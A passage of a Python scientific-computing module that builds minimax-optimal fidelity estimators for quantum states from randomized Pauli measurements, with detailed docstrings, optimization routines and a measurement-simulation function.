        (p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
        (p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
    are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
    R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
    There are a total of N POVMs.
    X is the set of density matrices, rho is the "target" density matrix. r > 0 is a parameter.

    Then, given the saddle point sigma_1*, sigma_2*, phi*, alpha*, we can construct an estimator
        \hat{F}(\omega^{1}_1, ..., \omega^{1}_{R_1}, ... \omega^{N}_1, ..., \omega^{N}_{R_N})
                = \sum_{i = 1}^N \sum_{l = 1}^{R_i} phi^{i}*(\omega^{i}_l) + c
    where the constant 'c' is given by the optimization problem
        c = 0.5 \max_{sigma_1} [Tr(rho sigma_1) + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(-phi^{i}_k/alpha) (p^{i}_1)_k)]
            - 0.5 \max_{sigma_2} [-Tr(rho sigma_2) + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(phi^{i}_k/alpha) (p^{i}_2)_k)]

    The saddle point value \Phi*(r) gives an upper bound for the confidence interval within which the error lies.

    The above procedure described can be expensive in large dimensions. For the case of randomized Pauli measurement (RPM) strategy,
    the algorithms are specialized so that very large dimensions can be handled.

    For arbitrary pure target states, the RPM strategy corresponds to randomly sampling Pauli operators according to some predetermined
    sampling probability, measuring these Pauli operators, and recording their outcomes (+1 or -1 eigenavalue).
    For stabilizer states, this measurement strategy reduces to uniformly randomly sampling from the stabilizer group (all elements
    except the identity) and measuring them.
    """
    def __init__(self, n, R, NF, epsilon, epsilon_o, tol = 1e-6, random_init = False, print_progress = True):
        """
        Assigns values to parameters and defines and initializes functions.

        The estimator depends on the dimension of the target state, the number of repetitions of the measurement, a normalization factor,
        and the confidence level.
        It is independent of the actual target state used for the RPM strategy, except through the normalization factor described below.

        The small parameter epsilon_o required to formalize Juditsky & Nemirovski's approach is used only in the optimization for finding alpha.
        It is not used in finding the optimal sigma_1 and sigma_2 because those are computed "by hand".

        Arguments:
            - n              : dimension of the system
            - R              : total number of repetitions used
            - NF             : the normalization factor, NF = \sum_i |tr(W_i rho)|,
                               where the sum is over all non-identity Paulis and rho is the target state
            - epsilon        : 1 - confidence level, should be between 0 and 0.25, end points excluded
            - epsilon_o      : constant to prevent zero probabilities in Born's rule
            - tol            : tolerance used by the optimization algorithms
            - random_init    : if True, a random initial condition is used for the optimization
            - print_progress : if True, the progress of optimization is printed
        """
        # confidence level
        self.epsilon = epsilon
        # obtain 'r' from \epsilon
        self.r = np.log(2./epsilon)
        # constant to keep the probabilities in Born rule positive
        self.epsilon_o = epsilon_o
        # dimension of the system
        self.n = n
        # number of repetitions of the (minimax optimal) measurement
        self.R = R
        # the normalization factor, NF = \sum_i |tr(W_i rho)|; state dependent
        self.NF = NF
        # quantities defining the POVM (Born probabilities of the two-outcome
        # effective measurement for the target and orthogonal components)
        self.omega1 = 0.5 * (n + NF - 1) / NF
        self.omega2 = 0.5 * (NF - 1) / NF
        # lower bound for the (classical) fidelity, used in the theory for optimization
        self.gamma = (epsilon/2)**(2/R)
        # minimum number of repetitions required for a risk less than 0.5
        self.Ro = np.ceil(np.log(2/epsilon) / np.abs(np.log(np.sqrt(self.omega1 * self.omega2) + np.sqrt(np.abs((1 - self.omega1) * (1 - self.omega2))))))
        # if gamma is not large enough, we have a risk of 0.5
        # NOTE(review): MinimaxOptimizationWarning is not among this module's
        # visible imports — confirm it is provided elsewhere in the project.
        if R <= self.Ro:
            warnings.warn("The number of repetitions are very low. Consider raising the number of repetitions to at least %d." %self.Ro, MinimaxOptimizationWarning)
        # tolerance for all the computations
        self.tol = tol
        # initialization for maximize_Phi_r_density_matrices_multiple_measurements (to be used specifically for find_alpha_saddle_point_fidelity_estimation)
        if not random_init:
            # we choose lambda_1 = lambda_2 = 0.9, which corresponds to sigma_1 = 0.9 rho + 0.1 rho_1_perp, sigma_2 = 0.9 rho + 0.1 rho_2_perp
            self.mpdm_lambda_ds_o = np.array([0.9, 0.9])
        else:
            # take lambda_1 and lambda_2 as some random number between 0 and 1
            self.mpdm_lambda_ds_o = np.random.random(size = 2)
        # determine whether to print progress
        self.print_progress = print_progress
        # determine whether the optimization achieved the tolerance
        self.success = True

    ###----- Finding x, y maximum and alpha minimum of \Phi_r
    def maximize_Phi_r_alpha_density_matrices(self, alpha):
        """
        Solves the optimization problem
            \max_{sigma_1, sigma_2 \in X} \Phi_r_alpha(sigma_1, sigma_2)
                = -\min_{sigma_1, sigma_2 \in X} -\Phi_r_alpha(sigma_1, sigma_2)
        for a number alpha > 0.

        The objective function is given as
            Phi_r_alpha(sigma_1, sigma_2) = Tr(rho sigma_1) - Tr(rho sigma_2)
                                             + 2 alpha \sum_{i = 1}^N R_i log(\sum_{k = 1}^{N_i} \sqrt{(p^{i}_1)_k (p^{i}_2)_k})
        where
            (p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
            (p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
        are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
        R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
        There are a total of N POVMs.

        We parametrize the density matrices as the following convex combination
            sigma_1 = lambda_1 rho + (1 - lambda_1) rho_1_perp
            sigma_2 = lambda_2 rho + (1 - lambda_2) rho_2_perp
        where 0 <= lambda_1, lambda_2 <= 1, and rho_1_perp and rho_2_perp are density matrices in the orthogonal complement of the target state rho.

        The minimax measurement strategy consists of a single POVM with two elements {Omega, Delta_Omega}. With respect to this POVM, the Born probabilities are
            Tr(Omega sigma_1) = omega_1 lambda_1 + omega_2 (1 - lambda_1)
            Tr(Delta_Omega sigma_1) = (1 - omega_1) lambda_1 + (1 - omega_2) (1 - lambda_1)
        and a similar expression can be written for sigma_2.
        We include the parameter epsilon_o in the Born probabilities to avoid zero-division while calculating the derivative of Phi_r.

        Using the above, we reduce the optimization to two dimensions, irrespective of the dimension of rho.
        The optimization is performed using proximal gradient.
        """
        # we work with direct sum lambda_ds = (lambda_1, lambda_2) for use in pre-written algorithms
        # the objective function (we work with negative of \Phi_r_alpha so that we can minimize instead of maximize)
        def f(lambda_ds):
            lambda_1 = lambda_ds[0]
            lambda_2 = lambda_ds[1]
            # start with the terms that don't depend on POVMs
            f_val = -lambda_1 + lambda_2
            # number of repetitions of the POVM measurement
            R = self.R
            # the probability distributions corresponding to the minimax optimal POVM:
            # p_1^{i}(k) = (<E^{i}_k, sigma_1> + \epsilon_o/Ni)/(1 + \epsilon_o) and
            # p_2^{i}(k) = (<E^{i}_k, sigma_2> + \epsilon_o/Ni)/(1 + \epsilon_o)
            p_1 = (np.array([self.omega1 * lambda_1 + self.omega2 * (1 - lambda_1), (1 - self.omega1) * lambda_1 + (1 - self.omega2) * (1 - lambda_1)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
            p_2 = (np.array([self.omega1 * lambda_2 + self.omega2 * (1 - lambda_2), (1 - self.omega1) * lambda_2 + (1 - self.omega2) * (1 - lambda_2)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
            f_val = f_val - 2*alpha * R * np.log(np.sqrt(p_1).dot(np.sqrt(p_2)))
            return f_val

        def gradf(lambda_ds):
            lambda_1 = lambda_ds[0]
            lambda_2 = lambda_ds[1]
            # start with the terms that don't depend on POVMs
            # gradient with respect to lambda_1
            gradf_lambda_1_val = -1
            # gradient with respect to lambda_2
            gradf_lambda_2_val = 1
            # number of repetitions of the POVM measurement
            R = self.R
            # the probability distributions corresponding to the POVM:
            # p_1^{i}(k) = (<E^{i}_k, sigma_1> + \epsilon_o/Nm)/(1 + \epsilon_o) and
            # p_2^{i}(k) = (<E^{i}_k, sigma_2> + \epsilon_o/Nm)/(1 + \epsilon_o)
            p_1 = (np.array([self.omega1 * lambda_1 + self.omega2 * (1 - lambda_1), (1 - self.omega1) * lambda_1 + (1 - self.omega2) * (1 - lambda_1)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
            p_2 = (np.array([self.omega1 * lambda_2 + self.omega2 * (1 - lambda_2), (1 - self.omega1) * lambda_2 + (1 - self.omega2) * (1 - lambda_2)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
            # Hellinger affinity between p_1 and p_2
            AffH = np.sqrt(p_1).dot(np.sqrt(p_2))
            # gradient with respect to lambda_1
            gradf_lambda_1_val = gradf_lambda_1_val - alpha * R * (self.omega1 - self.omega2) * np.sqrt(p_2/p_1).dot(np.array([1, -1]))/(AffH * (1. + self.epsilon_o))
            # gradient with respect to lambda_2
            gradf_lambda_2_val = gradf_lambda_2_val - alpha * R * (self.omega1 - self.omega2) * np.sqrt(p_1/p_2).dot(np.array([1, -1]))/(AffH * (1. + self.epsilon_o))
            # gradient with respect to lambda_ds
            gradf_val = np.array([gradf_lambda_1_val, gradf_lambda_2_val])
            return gradf_val

        # the other part of the objective function is an indicator function on X x X, so it is set to zero because all iterates in Nesterov's
        # second method are inside the domain
        P = lambda lambda_ds: 0.

        # proximal operator of an indicator function is a projection
        def prox_lP(lambda_ds, l, tol):
            # we project each component of lambda_ds into the unit interval [0, 1]
            lambda_1_projection = project_on_box(lambda_ds[0], 0, 1)
            lambda_2_projection = project_on_box(lambda_ds[1], 0, 1)
            lambda_ds_projection = np.array([lambda_1_projection, lambda_2_projection])
            return lambda_ds_projection

        # perform the minimization using Nesterov's second method (accelerated proximal gradient)
        lambda_ds_opt, error = minimize_proximal_gradient_nesterov(f, P, gradf, prox_lP, self.mpdm_lambda_ds_o, tol = self.tol, return_error = True)
        # check if tolerance is satisfied
        if error > self.tol:
            self.success = False
            warnings.warn("The tolerance for the optimization was not achieved. The estimates may be unreliable. Consider using a random initial condition by setting random_init = True.", MinimaxOptimizationWarning)
        # store the optimal point as initial condition for future use
        self.mpdm_lambda_ds_o = lambda_ds_opt
        # obtain the density matrices at the optimum
        self.lambda_1_opt = lambda_ds_opt[0]
        self.lambda_2_opt = lambda_ds_opt[1]
        return (self.lambda_1_opt, self.lambda_2_opt, -f(lambda_ds_opt))

    def find_density_matrices_alpha_saddle_point(self):
        """
        Solves the optimization problem
            \min_{alpha > 0} (alpha r + 0.5*inf_phi bar{Phi_r}(phi, alpha))

        The function bar{\Phi_r} is given as
            bar{\Phi_r}(phi, alpha) = \max_{sigma_1, sigma_2 \in X} \Phi_r(sigma_1, sigma_2; phi, alpha)
        for any given vector phi \in R^{N_m} and alpha > 0.

        The infinum over phi of bar{\Phi_r} can be solved to obtain
            Phi_r_bar_alpha = \inf_phi bar{Phi_r}(phi, alpha)
                            = \max_{sigma_1, sigma_2 \in X} \inf_phi \Phi_r(sigma_1, sigma_2; phi, alpha)
                            = \max_{sigma_1, sigma_2 \in X} [Tr(rho sigma_1) - Tr(rho sigma_2)
                                                              + 2 alpha \sum_{i = 1}^N R_i log(\sum_{k = 1}^{N_i} \sqrt{(p^{i}_1)_k (p^{i}_2)_k})]
        where
            (p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
            (p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
        are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
        R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
        There are a total of N POVMs.

        We define
            Phi_r_alpha(sigma_1, sigma_2) = Tr(rho sigma_1) - Tr(rho sigma_2)
                                             + 2 alpha \sum_{i = 1}^N R_i log(\sum_{k = 1}^{N_i} \sqrt{(p^{i}_1)_k (p^{i}_2)_k})
        so that
            Phi_r_bar_alpha = \max_{sigma_1, sigma_2 \in X} Phi_r_alpha(sigma_1, sigma_2)

        Note that Phi_r_bar_alpha >= 0 since Phi_r_alpha(sigma_1, sigma_1) = 0.
        """
        # print progress, if required
        if self.print_progress:
            print("Beginning optimization".ljust(22), end = "\r", flush = True)

        def Phi_r_bar_alpha(alpha):
            Phi_r_bar_alpha_val = alpha*self.r + 0.5*self.maximize_Phi_r_alpha_density_matrices(alpha = alpha)[2]
            return Phi_r_bar_alpha_val

        # perform the minimization
        alpha_optimization_result = sp.optimize.minimize_scalar(Phi_r_bar_alpha, bounds = (1e-16, 1e3), method = 'bounded')
        # value of alpha at optimum
        self.alpha_opt = alpha_optimization_result.x
        # value of objective function at optimum: gives the risk
        self.Phi_r_bar_alpha_opt = alpha_optimization_result.fun
        # print progress, if required
        if self.print_progress:
            print("Optimization complete".ljust(22))
        # check if alpha optimization was successful
        if not alpha_optimization_result.success:
            self.success = False
            warnings.warn("The optimization has not converge properly to the saddle-point. The estimates may be unreliable. Consider using a random initial condition by setting random_init = True.", MinimaxOptimizationWarning)
        return (self.lambda_1_opt, self.lambda_2_opt, self.alpha_opt)
    ###----- Finding x, y maximum and alpha minimum of \Phi_r

    ###----- Constructing the fidelity estimator
    def find_fidelity_estimator(self):
        """
        Constructs an estimator for fidelity between a pure state rho and an unknown state sigma.

        First, the saddle point sigma_1*, sigma_2*, phi*, alpha* of the function
            \Phi_r(sigma_1, sigma_2; phi, alpha) = Tr(rho sigma_1) - Tr(rho sigma_2)
                                                    + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(-phi^{i}_k/alpha) (p^{i}_1)_k)
                                                    + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(phi^{i}_k/alpha) (p^{i}_2)_k)
                                                    + 2 alpha r
        is found. Here,
            (p^{i}_1)_k = (Tr(E^(i)_k sigma_1) + \epsilon_o/Nm) / (1 + \epsilon_o) and
            (p^{i}_2)_k = (Tr(E^{i}_k sigma_2) + \epsilon_o/Nm) / (1 + \epsilon_o)
        are the probability distributions corresponding to the ith POVM {E^{i}_k}_{k = 1}^{N_i} with N_i elements.
        R_i > 0 is a parameter that denotes the number of observations of the ith type of measurement (i.e., ith POVM).
        There are a total of N POVMs.

        Then, an estimator is constructed as follows.
            \hat{F}(\omega^{1}_1, ..., \omega^{1}_{R_1}, ..., \omega^{N}_1, ..., \omega^{N}_{R_N})
                    = \sum_{i = 1}^N \sum_{l = 1}^{R_i} phi*(\omega^{i}_l) + c
        where the constant 'c' is given by the optimization problem
            c = 0.5 \max_{sigma_1} [Tr(rho sigma_1) + \sum_{i = 1}^N alpha* R_i log(\sum_{k = 1}^{N_i} exp(-phi*^{i}_k/alpha*) (p^{i}_1)_k)]
                - 0.5 \max_{sigma_2} [-Tr(rho sigma_2) + \sum_{i = 1}^N alpha* R_i log(\sum_{k = 1}^{N_i} exp(phi*^{i}_k/alpha*) (p^{i}_2)_k)]

        We use the convention that the ith POVM outcomes are labelled as \Omega_i = {0, ..., N_m - 1}, as Python is zero-indexed.

        The above is the general procedure to obtain Juditsky & Nemirovski's estimator.
        For the special case of randomized Pauli measurement strategy, we simplify the above algorithms
        so that we can compure the estimator for very large dimensions.
        """
        # find x, y, and alpha components of the saddle point
        lambda_1_opt, lambda_2_opt, alpha_opt = self.find_density_matrices_alpha_saddle_point()
        # the saddle point value of \Phi_r
        Phi_r_opt = self.Phi_r_bar_alpha_opt
        # construct (phi/alpha)* at saddle point using lambda_1* and lambda_2*
        # the probability distributions corresponding to sigma_1*, sigma_2*:
        # p^{i}_1(k) = (<E^{i}_k, sigma_1*> + \epsilon_o/Ni)/(1 + \epsilon_o) and
        # p^{i}_2(k) = (<E^{i}_k, sigma_2*> + \epsilon_o/Ni)/(1 + \epsilon_o)
        p_1_opt = (np.array([self.omega1 * lambda_1_opt + self.omega2 * (1 - lambda_1_opt), (1 - self.omega1) * lambda_1_opt + (1 - self.omega2) * (1 - lambda_1_opt)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
        p_2_opt = (np.array([self.omega1 * lambda_2_opt + self.omega2 * (1 - lambda_2_opt), (1 - self.omega1) * lambda_2_opt + (1 - self.omega2) * (1 - lambda_2_opt)]) + self.epsilon_o/2) / (1. + self.epsilon_o)
        # (phi/alpha)* at the saddle point
        phi_alpha_opt = 0.5*np.log(p_1_opt/p_2_opt)
        # obtain phi* at the saddle point
        self.phi_opt = phi_alpha_opt * self.alpha_opt
        # find the constant in the estimator
        # c = 0.5 (Tr(rho sigma_1*) + Tr(rho sigma_2*)) = 0.5 (lambda_1* + lambda_2*)
        self.c = 0.5*(lambda_1_opt + lambda_2_opt)
        # build the estimator
        def estimator(data):
            """
            Given R independent and identically distributed elements from \Omega = {1, 2} (2 possible outcomes) sampled
            as per p_{A(sigma)}, gives the estimate for the fidelity F(rho, sigma) = Tr(rho sigma).
                \hat{F}(\omega_1, ..., \omega_R)
                        = \sum_{l = 1}^{R_i} phi^{i}*(\omega^{i}_l) + c
            """
            # if a list of list is provided, following convention for Fidelity_Estimation_Manager, we obtain the list of data inside
            if type(data[0]) in [list, tuple, np.ndarray]:
                data = data[0]
            # ensure that only data has only R elements (i.e., R repetitions), because the estimator is built for just that case
            if len(data) != self.R:
                raise ValueError("The estimator is built to handle only %d outcomes, while %d outcomes have been supplied." %(self.R, len(data)))
            # start with the terms that don't depend on the POVMs
            estimate = self.c
            # build the estimate using the phi* component at the saddle point, accounting for data from the POVM
            estimate = estimate + np.sum([self.phi_opt[l] for l in data])
            return estimate
        self.estimator = estimator
        return (estimator, Phi_r_opt)
    ###----- Constructing the fidelity estimator
def generate_sampled_pauli_measurement_outcomes(rho, sigma, R, num_povm_list, epsilon_o, flip_outcomes = False):
    """
    Generate outcomes (indices into an effective two-element POVM) for a Pauli sampling measurement strategy.

    The strategy samples non-identity Pauli group elements, measures them, and only uses the
    eigenvalue (either +1 or -1) of the measured outcome.
    The sampling is done as per the probability distribution p_i = |tr(W_i rho)| / \sum_i |tr(W_i rho)|.
    We represent this procedure by an effective POVM containing two elements: outcome eigenvalue +1
    corresponds to index 0 of the effective POVM, and eigenvalue -1 corresponds to index 1.
    If flip_outcomes is True, we measure the Paulis as-is and later flip the measurement outcomes
    (+1 <-> -1) as necessary; if not, we directly measure the negative of the Pauli operator.

    Arguments:
        rho           : target state (density matrix), expected flattened in row-major style
        sigma         : actual state "prepared in the lab" (density matrix), flattened row-major
        R             : total number of Pauli measurement repetitions
        num_povm_list : POVM elements per measurement (2 or n); a scalar is broadcast to all measurements
        epsilon_o     : smoothing parameter forwarded to Measurement_Manager.perform_measurements
        flip_outcomes : see above

    Returns:
        list of effective-POVM outcome indices (0 or 1), one per repetition, concatenated over all
        sampled Pauli measurements.
    """
    # dimension of the system; rho is expected to be flattened, but this expression is agnostic to that
    n = int(np.sqrt(rho.size))
    # number of qubits
    nq = int(np.log2(n))
    if 2**nq != n:
        raise ValueError("Pauli measurements possible only in systems of qubits, i.e., the dimension should be a power of 2")
    # ensure that the states are flattened
    rho = rho.ravel()
    sigma = sigma.ravel()
    # index of each Pauli whose weight needs to be computed (identity, index 0, excluded)
    pauli_index_list = range(1, 4**nq)
    # find Tr(rho W) for each Pauli operator W; this is only a heuristic weight if rho is not pure
    # (these are not the same as Flammia & Liu weights)
    # computing each Pauli operator individually (as opposed to computing a list of all Pauli operators
    # at once) is a little slower, but can handle a larger number of qubits
    pauli_weight_list = [np.real(np.conj(rho).dot(generate_Pauli_operator(nq = nq, index_list = pauli_index, flatten = True)[0])) for pauli_index in pauli_index_list]
    # phase of each pauli operator (either +1 or -1)
    pauli_phase_list = [np.sign(pauli_weight) for pauli_weight in pauli_weight_list]
    # set of pauli operators along with their phases from which we will sample
    pauli_measurements = list(zip(pauli_index_list, pauli_phase_list))
    # probability distribution with which the Paulis should be sampled
    pauli_sample_prob = np.abs(pauli_weight_list)
    # normalization factor for pauli probability
    NF = np.sum(pauli_sample_prob)
    # normalize the sampling probability
    pauli_sample_prob = pauli_sample_prob / NF
    # the effective POVM for the minimax optimal strategy consists of just two POVM elements;
    # the actual measurements performed are 'R' Pauli measurements sampled as per pauli_sample_prob
    # np.random.choice doesn't allow a list of tuples directly, so indices are sampled instead
    # see https://stackoverflow.com/questions/30821071/how-to-use-numpy-random-choice-in-a-list-of-tuples/55517163
    uniformly_sampled_indices = np.random.choice(len(pauli_measurements), size = int(R), p = pauli_sample_prob)
    pauli_to_measure_with_repetitions = [pauli_measurements[index] for index in uniformly_sampled_indices]
    # unique Pauli measurements to be performed, with phase, sorted by Pauli index
    pauli_to_measure = sorted(list(set(pauli_to_measure_with_repetitions)), key = lambda x: x[0])
    # number of repetitions for each unique Pauli measurement (i.e., number of duplicates);
    # the bins are the sorted unique indices plus one sentinel past the largest index
    R_list, _ = np.histogram([pauli_index for (pauli_index, _) in pauli_to_measure_with_repetitions], bins = [pauli_index for (pauli_index, _) in pauli_to_measure] + [pauli_to_measure[-1][0] + 1], density = False)
    # list of number of POVM elements for each (type of) measurement
    # if a single number is provided, a list (of integers) is created from it
    if type(num_povm_list) not in [list, tuple, np.ndarray]:
        num_povm_list = [int(num_povm_list)] * len(R_list)
    else:
        num_povm_list = [int(num_povm) for num_povm in num_povm_list]
    # generate POVMs for measurement
    POVM_list = [None] * len(R_list)
    for (count, num_povm) in enumerate(num_povm_list):
        # index of pauli operator to measure, along with the phase
        pauli, phase = pauli_to_measure[count]
        if flip_outcomes:
            # don't include the phase while measuring;
            # the phase is incorporated after the measurement outcomes are obtained
            phase = 1
        # generate POVM depending on whether projectors on subspaces or on each eigenvector are required
        # when n = 2, subspace and eigenbasis projectors match; we give precedence to eigenbasis
        # projection because the outcome-conversion block below applies the phase when num_povm == n,
        # and if the subspace branch had already included the phase it would be applied twice
        if num_povm == n:
            # ensure that the supplied Pauli operator is a string composed of 0, 1, 2, 3
            if type(pauli) in [int, np.int64]:
                if pauli > 4**nq - 1:
                    raise ValueError("Each pauli must be a number between 0 and 4^{nq} - 1")
                # make sure pauli is a string
                pauli = np.base_repr(pauli, base = 4)
                # pad pauli with 0s on the left so that the string has size nq (a Pauli operator on nq qubits)
                pauli = pauli.rjust(nq, '0')
            elif type(pauli) == str:
                # get the corresponding integer
                pauli_num = np.array(list(pauli), dtype = 'int')
                pauli_num = pauli_num.dot(4**np.arange(len(pauli) - 1, -1, -1))
                if pauli_num > 4**nq - 1:
                    raise ValueError("Each pauli must be a number between 0 and 4^{nq} - 1")
                # pad pauli with 0s on the left so that the string has size nq
                pauli = pauli.rjust(nq, '0')
            # POVM elements are rank-1 projectors onto the (orthonormal) eigenbasis of the Pauli operator
            # - first create the computational basis POVM, then rotate it into the respective Pauli basis
            computational_basis_POVM = generate_POVM(n = n, num_povm = n, projective = True, pauli = None, flatten = False, isComplex = True, verify = False)
            # - Pauli X basis: rotate the computational basis with the Hadamard matrix
            # - Pauli Y basis: rotate with a Hadamard-like matrix
            # a dictionary holds these single-qubit basis-change unitaries, keyed by Pauli digit
            comp_basis_transform_dict = {'0': np.eye(2, dtype = 'complex128'), '1': np.array([[1., 1.], [1., -1.]], dtype = 'complex128')/np.sqrt(2),\
                                         '2': np.array([[1., 1.], [1.j, -1.j]], dtype = 'complex128')/np.sqrt(2), '3': np.eye(2, dtype = 'complex128')}
            transform_matrix = np.eye(1)
            # 'pauli' encodes a tensor product of nq 1-qubit Paulis; build the unitary mapping the
            # computational basis to the Pauli eigenbasis one qubit at a time
            for ithpauli in pauli:
                transform_matrix = np.kron(transform_matrix, comp_basis_transform_dict[ithpauli])
            # create the POVM by transforming the computational basis to the given Pauli basis;
            # the phase doesn't matter when projecting onto the eigenbasis (eigenvalues are inferred
            # after measurement)
            POVM = [transform_matrix.dot(Ei).dot(np.conj(transform_matrix.T)).ravel() for Ei in computational_basis_POVM]
        elif num_povm == 2:
            # the Pauli operator that needs to be measured
            Pauli_operator = phase * generate_Pauli_operator(nq, pauli)[0]
            # if W is the Pauli operator and P_+, P_- project onto the eigenspaces of +1 (+i) & -1 (-i)
            # eigenvalues, then l P_+ - l P_- = W and P_+ + P_- = \id; solve for P_+ and P_-.
            # l \in {1, i} depending on the phase; l = sgn(phase) * phase, since phase is one of +1, -1, +i, -i
            P_plus = 0.5*(np.eye(n, dtype = 'complex128') + Pauli_operator / (phase * np.sign(phase)))
            P_minus = 0.5*(np.eye(n, dtype = 'complex128') - Pauli_operator / (phase * np.sign(phase)))
            POVM = [P_plus.ravel(), P_minus.ravel()]
        else:
            raise ValueError("Pauli measurements with only 2 or 'n' POVM elements are supported")
        # store the POVM for measurement
        POVM_list[count] = POVM
    # initiate the measurements
    measurement_manager = Measurement_Manager(random_seed = None)
    measurement_manager.n = n
    measurement_manager.N = len(POVM_list)
    measurement_manager.POVM_mat_list = [np.vstack(POVM) for POVM in POVM_list]
    measurement_manager.N_list = [len(POVM) for POVM in POVM_list]
    # perform the measurements
    data_list = measurement_manager.perform_measurements(sigma, R_list, epsilon_o, num_sets_outcomes = 1, return_outcomes = True)[0]
    # convert the outcomes of the Pauli measurements to those of the effective POVM
    effective_outcomes = list()
    for (count, data) in enumerate(data_list):
        num_povm = num_povm_list[count]
        pauli_index, phase = pauli_to_measure[count]
        if flip_outcomes:
            # store the actual phase for later use
            actual_phase = int(phase)
            # Paulis were measured without the phase, so convert outcomes to the effective POVM
            # with that in mind
            phase = 1
        # for num_povm = 2, nothing to do: outcome 0 already corresponds to the +1 eigenvalue and
        # outcome 1 to the -1 eigenvalue; if flip_outcomes is True the indices are flipped below.
        # for num_povm = n, figure out the eigenvalue from the outcome (an index 0..n-1 into the basis)
        # and map +1 eigenvalue -> index 0, -1 eigenvalue -> index 1 of the effective POVM
        if num_povm == n:
            # all Paulis have eigenvalues +1, -1; half the eigenbasis carries +1 and the other half -1.
            # assign an "eigenvalue weight" of 1 to non-identity 1-qubit Paulis (X, Y, Z) and 0 to
            # the identity, writing the nq-qubit Pauli W as a weight array w_1...w_nq; the computational
            # basis state |i_1...i_nq>, transformed to the eigenbasis of W, has eigenvalue
            # phase * (-1)^(i_1*w_1 + ... + i_nq*w_nq)
            pauli_eigval_weight = lambda pauli_index: np.where(np.array(list(np.base_repr(pauli_index, base = 4).rjust(nq, '0')), dtype = 'int8') == 0, 0, 1)
            # array of 0/1 bits representing a computational basis element, from its index 0..2^nq - 1
            computational_basis_array = lambda computational_basis_index: np.array(list(np.base_repr(computational_basis_index, base = 2).rjust(nq, '0')), dtype = 'int8')
            # convert each eigenvalue e (+1 or -1) to the effective-POVM index (1 - e)/2, i.e. 0 or 1;
            # type-cast to int because an index is expected for each outcome
            data = [int(np.real( (1 - phase*(-1)**(computational_basis_array(outcome_index).dot(pauli_eigval_weight(pauli_index)))) / 2 )) for outcome_index in data]
        if flip_outcomes and actual_phase == -1:
            # now that we have the data for the effective POVM (without the phase), flip the outcomes
            data = [1 - outcome_index for outcome_index in data]
        # include this in the list of outcomes for the effective measurement
        effective_outcomes.extend(data)
    return effective_outcomes
def fidelity_estimation_pauli_random_sampling(target_state = 'random', nq = 2, num_povm_list = 2, R = 100, epsilon = 0.05, risk = None, epsilon_o = 1e-5, noise = True,\
                                              noise_type = 'depolarizing', state_args = None, flip_outcomes = False, tol = 1e-6, random_seed = 1, verify_estimator = False,\
                                              print_result = True, write_to_file = False, dirpath = './Data/Computational/', filename = 'temp'):
    """
    Generate the state defined by 'target_state' and state_args, and find an estimator for fidelity
    using Juditsky & Nemirovski's approach specialized to random sampling of Pauli operators.
    The specialized approach allows computation of the estimator for very large dimensions.

    The random sampling is done as per p_i = |tr(W_i rho)| / \sum_i |tr(W_i rho)|, where W_i is the
    ith Pauli operator and rho is the target state. This sampling is accounted for by a single
    effective POVM, so the number of measurement types (N) is one. The estimator and the risk only
    depend on the dimension, the number of repetitions, the confidence level, and the normalization
    factor NF = \sum_i |tr(W_i rho)|.

    If risk is a number less than 0.5, the number of repetitions is chosen so that the risk of the
    estimator is at most the given risk; the argument R is then ignored.
    For target_state == 'stabilizer', state_args['generators'] supplies the generators; checks are
    not performed to ensure that they indeed form generators.
    If verify_estimator is True, the specialized estimator is cross-checked against the general
    Juditsky & Nemirovski construction.

    Returns the Pauli_Sampler_Fidelity_Estimation_Manager (and, if verify_estimator, also the
    general Fidelity_Estimation_Manager_Corrected).

    NOTE(review): noise_type, write_to_file, dirpath and filename are accepted but never read in
    this function body — presumably kept for interface parity with sibling drivers; confirm.
    """
    # set the random seed once here and nowhere else
    if random_seed:
        np.random.seed(int(random_seed))
    # number of qubits
    nq = int(nq)
    # dimension of the system
    n = int(2**nq)
    ### create the states
    # create the target state from the specified description
    target_state = str(target_state).lower()
    if target_state in ['ghz', 'w', 'cluster']:
        state_args_dict = {'ghz': {'d': 2, 'M': nq}, 'w': {'nq': nq}, 'cluster': {'nq': nq}}
        rho = generate_special_state(state = target_state, state_args = state_args_dict[target_state], density_matrix = True,\
                                     flatten = True, isComplex = True)
    elif target_state == 'stabilizer':
        generators = state_args['generators']
        # if generators are specified using I, X, Y, Z, convert them to 0, 1, 2, 3
        generators = [g.lower().translate(str.maketrans('ixyz', '0123')) for g in generators]
        rho = generate_special_state(state = 'stabilizer', state_args = {'nq': nq, 'generators': generators}, density_matrix = True, flatten = True, isComplex = True)
    elif target_state == 'random':
        rho = generate_random_state(n = n, pure = True, density_matrix = True, flatten = True, isComplex = True, verify = False, random_seed = None)
    else:
        raise ValueError("Please specify a valid target state. Currently supported arguments are GHZ, W, Cluster, stabilizer and random.")
    # apply noise to the target state to create the actual state ("prepared in the lab")
    if not ((noise is None) or (noise is False)):
        # the target state decoheres due to noise; a numeric noise value is the depolarizing
        # strength, any other truthy value falls back to p = 0.1
        if type(noise) in [int, float]:
